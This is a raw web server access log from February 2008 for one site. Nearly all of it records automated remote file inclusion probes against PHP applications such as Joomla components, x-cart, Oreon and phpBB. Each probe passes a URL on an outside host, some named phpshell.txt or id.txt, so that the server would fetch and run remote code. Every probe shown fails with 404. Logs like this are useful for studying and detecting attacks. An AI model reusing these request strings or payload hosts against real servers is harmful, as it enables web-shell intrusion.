202.157.176.231 - - [14/Feb/2008:07:16:39 -0800] "GET /scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:16:39 -0800] "GET /logs/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.141.232 - - [14/Feb/2008:07:18:09 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
207.58.141.232 - - [14/Feb/2008:07:18:09 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
69.59.17.71 - - [14/Feb/2008:07:18:33 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.59.17.71 - - [14/Feb/2008:07:18:35 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
63.247.138.125 - - [14/Feb/2008:07:18:37 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
63.247.138.125 - - [14/Feb/2008:07:18:37 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:07:18:38 -0800] "GET /port.php?content=http://brasirc.t35.com/phpshell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.250.2.37 - - [14/Feb/2008:07:18:39 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.250.2.37 - - [14/Feb/2008:07:18:39 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:18:54 -0800] "GET /logs/access_080131.log/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:18:55 -0800] "GET /scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:18:56 -0800] "GET /logs/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:07:19:54 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:07:19:55 -0800] "GET /plans/A3_ROOF_PLAN.pdf HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:20:11 -0800] "GET /logs/access_080131.log/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:20:11 -0800] "GET /scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:20:12 -0800] "GET /logs/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.248.95 - - [14/Feb/2008:07:21:34 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [14/Feb/2008:07:21:34 -0800] "GET /config.php?path_to_root=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [14/Feb/2008:07:21:35 -0800] "GET /logs/config.php?path_to_root=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.86.123.61 - - [14/Feb/2008:07:21:38 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.86.123.61 - - [14/Feb/2008:07:21:38 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:21:40 -0800] "GET /logs/access_080131.log/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:21:40 -0800] "GET /scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.157.176.231 - - [14/Feb/2008:07:21:41 -0800] "GET /logs/scanhttp://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.201.194 - - [14/Feb/2008:07:21:41 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sirtott1.ifrance.com/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [14/Feb/2008:07:21:41 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sirtott1.ifrance.com/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [14/Feb/2008:07:21:42 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sirtott1.ifrance.com/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.38.90 - - [14/Feb/2008:07:22:08 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.15.38.90 - - [14/Feb/2008:07:22:09 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.193.248.95 - - [14/Feb/2008:07:22:52 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [14/Feb/2008:07:22:53 -0800] "GET /config.php?path_to_root=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [14/Feb/2008:07:22:53 -0800] "GET /logs/config.php?path_to_root=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [14/Feb/2008:07:23:03 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [14/Feb/2008:07:23:22 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.40.23.83 - - [14/Feb/2008:07:23:23 -0800] "GET /logs/access_080105.log//customer/product.php?xcart_dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [14/Feb/2008:07:23:23 -0800] "GET //customer/product.php?xcart_dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [14/Feb/2008:07:23:23 -0800] "GET /logs//customer/product.php?xcart_dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [14/Feb/2008:07:23:25 -0800] "GET /logs/access_071220.log//customer/product.php?xcart_dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.248.95 - - [14/Feb/2008:07:23:30 -0800] "GET /config.php?path_to_root=http://www.obzxpl.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.201.194 - - [14/Feb/2008:07:24:17 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sirtott1.ifrance.com/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:07:24:29 -0800] "GET /port.php?content=http://brasirc.t35.com/phpshell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [14/Feb/2008:07:24:37 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [14/Feb/2008:07:24:37 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [14/Feb/2008:07:24:37 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.35.158.181 - - [14/Feb/2008:07:26:10 -0800] "GET /logs/access_080105.log//customer/product.php?xcart_dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.180 - - [14/Feb/2008:07:26:10 -0800] "GET //customer/product.php?xcart_dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.114.1.214 - - [14/Feb/2008:07:26:11 -0800] "GET /logs/access_071230.log/vwar/vwar.php?vwar=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.35.158.180 - - [14/Feb/2008:07:26:11 -0800] "GET /logs//customer/product.php?xcart_dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.114.1.214 - - [14/Feb/2008:07:26:12 -0800] "GET /vwar/vwar.php?vwar=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.114.1.214 - - [14/Feb/2008:07:26:12 -0800] "GET /logs/vwar/vwar.php?vwar=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.194.218 - - [14/Feb/2008:07:26:13 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hotellasamericas.com.co//cache/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.194.218 - - [14/Feb/2008:07:26:13 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hotellasamericas.com.co//cache/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.194.218 - - [14/Feb/2008:07:26:13 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hotellasamericas.com.co//cache/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.153.146 - - [14/Feb/2008:07:26:41 -0800] "GET //tags.php?BBCodeFile=http://www.lamershell.de/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.242.153.146 - - [14/Feb/2008:07:26:41 -0800] "GET /logs//tags.php?BBCodeFile=http://www.lamershell.de/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
66.249.13.202 - - [14/Feb/2008:07:30:08 -0800] "GET /logs/access_080121.log/errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.13.202 - - [14/Feb/2008:07:30:08 -0800] "GET /errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.13.202 - - [14/Feb/2008:07:30:08 -0800] "GET /logs/errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.106.224.69 - - [14/Feb/2008:07:30:37 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.106.224.69 - - [14/Feb/2008:07:30:37 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.106.224.69 - - [14/Feb/2008:07:30:38 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.133.76 - - [14/Feb/2008:07:31:42 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://yudz-yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.81 - - [14/Feb/2008:07:31:49 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.85.29.25 - - [14/Feb/2008:07:31:58 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [14/Feb/2008:07:31:59 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [14/Feb/2008:07:32:01 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.7.232.34 - - [14/Feb/2008:07:33:02 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
208.7.232.34 - - [14/Feb/2008:07:33:03 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dritoni.ch/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:07:33:15 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:07:33:15 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:07:33:16 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:07:33:35 -0800] "GET /logs/access_080131.log/xGB.php?act=admin&do=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:07:33:35 -0800] "GET /xGB.php?act=admin&do=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:07:33:36 -0800] "GET /logs/xGB.php?act=admin&do=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:07:33:41 -0800] "GET /logs/access_080108.log/index.php?option=com_restaurante&task=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:07:33:42 -0800] "GET /index.php?option=com_restaurante&task=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:07:33:42 -0800] "GET /logs/index.php?option=com_restaurante&task=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.144 - - [14/Feb/2008:07:33:57 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [14/Feb/2008:07:33:57 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [14/Feb/2008:07:33:57 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:07:34:14 -0800] "GET /logs/access_071225.log/xGB.php?act=admin&do=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:07:34:38 -0800] "GET /logs/access_080131.log/xGB.php?act=admin&do=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:07:34:38 -0800] "GET /xGB.php?act=admin&do=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:07:34:38 -0800] "GET /logs/xGB.php?act=admin&do=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:07:34:49 -0800] "GET /logs/access_071225.log/xGB.php?act=admin&do=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.52.18 - - [14/Feb/2008:07:35:25 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.52.18 - - [14/Feb/2008:07:35:25 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.52.18 - - [14/Feb/2008:07:35:25 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.58.111.214 - - [14/Feb/2008:07:37:08 -0800] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://www.sitilinux.genova.it/whois/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.58.111.214 - - [14/Feb/2008:07:37:09 -0800] "GET //cyberfolio/portfolio/msg/view.php?av=http://www.sitilinux.genova.it/whois/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [14/Feb/2008:07:38:05 -0800] "GET /logs/access_071222.log//customer/product.php?xcart_dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.139.144 - - [14/Feb/2008:07:39:29 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [14/Feb/2008:07:39:29 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [14/Feb/2008:07:39:29 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [14/Feb/2008:07:39:32 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [14/Feb/2008:07:39:33 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [14/Feb/2008:07:39:33 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.249.33.227 - - [14/Feb/2008:07:39:51 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.52.18 - - [14/Feb/2008:07:40:22 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.52.18 - - [14/Feb/2008:07:40:22 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.52.18 - - [14/Feb/2008:07:40:22 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.52.18 - - [14/Feb/2008:07:40:30 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.52.18 - - [14/Feb/2008:07:40:30 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.52.18 - - [14/Feb/2008:07:40:30 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:07:40:55 -0800] "GET /logs/access_071231.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:07:40:56 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:07:40:56 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:07:40:59 -0800] "GET /logs/access_080120.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:07:41:02 -0800] "GET /index1.php?site=http://brasirc.t35.com/phpshell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:07:41:04 -0800] "GET /logs/access_080108.log/index.php?option=com_restaurante&task=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:07:41:04 -0800] "GET /index.php?option=com_restaurante&task=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:07:41:05 -0800] "GET /logs/index.php?option=com_restaurante&task=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [14/Feb/2008:07:41:43 -0800] "GET /logs/access_080103.log/include/logout.php?PSA_PATH=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [14/Feb/2008:07:41:43 -0800] "GET /include/logout.php?PSA_PATH=http://abelcoinc.com/AdvancedGuestBook//img/smilies/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
